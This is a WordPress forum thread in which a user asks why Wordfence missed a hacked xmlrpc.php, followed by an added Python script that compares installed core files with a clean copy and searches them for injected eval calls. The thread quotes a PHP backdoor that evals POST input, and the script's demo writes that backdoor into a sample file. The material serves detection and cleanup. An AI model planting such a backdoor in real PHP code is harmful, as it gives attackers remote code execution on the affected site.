Wordfence Security
[resolved] Wordfence not finding changed core file (3 posts)

  1. sneader
    Member
    Posted 1 year ago #

    I have a customer with a hacked WP installation. I see in their xmlrpc.php file that it is littered with:

    if (isset($_POST['wp-load'])) {
    eval($_POST['wp-load']);
    };

    I downloaded a fresh copy of WordPress 3.5.1, and the xmlrpc.php file doesn't have these lines anywhere.

    I am running a scan, with the checkbox "Scan core files against repository versions for changes" checked.

    Yet, the scan comes up clean! I have looked under the Ignored tab, and there is nothing.

    What could possibly prevent Wordfence from noticing a hacked core file that differs considerably from the one at the repository?

    - Scott

    http://wordpress.org/extend/plugins/wordfence/

  2. Wordfence
    Member
    Plugin Author

    Posted 1 year ago #

    Hi Scott,

    Perhaps the file isn't a core file. Sorry to state the obvious, but does the file perhaps have the same name as a core file but is in a different directory? Let me know what the full path is and I'll check.

    Thanks,

    Mark.

  3. sneader
    Member
    Posted 1 year ago #

    Hi Mark. I replied to this to close out the thread, but I see it didn't stick. It turns out the customer had hacked files on our server, but their DNS was still pointing to another host. So, we were running the scans on one host, and looking at files on another host! Egg on face.

    Wordfence is awesome and I am so glad you have put all this work into this product. I can't thank you enough.

    I'm sorry I wasn't able to remove the thread or otherwise stop you from wasting your time on this non-issue.

    - Scott
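
The check discussed in this thread (comparing installed core files with a fresh download and looking for the injected `eval` lines) can be reproduced by hand. The following is an added example, not part of the original posts and not Wordfence's code; the function names, the regular expression and the sample trees built by `build_demo` are constructed for illustration.

```python
import hashlib
import re
from pathlib import Path

# Constructed pattern: eval() applied directly to a request superglobal,
# the shape of the injected lines quoted in the first post.
BACKDOOR_RE = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit_core(site_root: Path, clean_root: Path) -> dict:
    """Compare every file of a clean WordPress copy with the installed one."""
    report = {"missing": [], "modified": [], "eval_hits": []}
    for ref in sorted(clean_root.rglob("*")):
        if not ref.is_file():
            continue
        rel = ref.relative_to(clean_root)
        live = site_root / rel
        if not live.is_file():
            report["missing"].append(rel.as_posix())
            continue
        if sha256_of(live) != sha256_of(ref):
            report["modified"].append(rel.as_posix())
            # Only changed core files are searched for the injected pattern.
            text = live.read_text(errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                if BACKDOOR_RE.search(line):
                    report["eval_hits"].append((rel.as_posix(), no))
    return report

def build_demo(base: Path):
    """Constructed sample trees: one clean reference, one tampered install."""
    clean, site = base / "clean", base / "site"
    for root in (clean, site):
        (root / "wp-includes").mkdir(parents=True)
        (root / "xmlrpc.php").write_text("<?php\ndefine('XMLRPC_REQUEST', true);\n")
        (root / "wp-includes" / "version.php").write_text("<?php\n$wp_version = '3.5.1';\n")
    with (site / "xmlrpc.php").open("a") as fh:
        fh.write("if (isset($_POST['wp-load'])) {\neval($_POST['wp-load']);\n};\n")
    return site, clean
```

Point `site_root` at the document root on the host that actually serves the site and `clean_root` at an unpacked download of the same WordPress version; as the thread's resolution shows, scanning a host the DNS does not point to reports on the wrong files.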

This topic has been closed to new replies.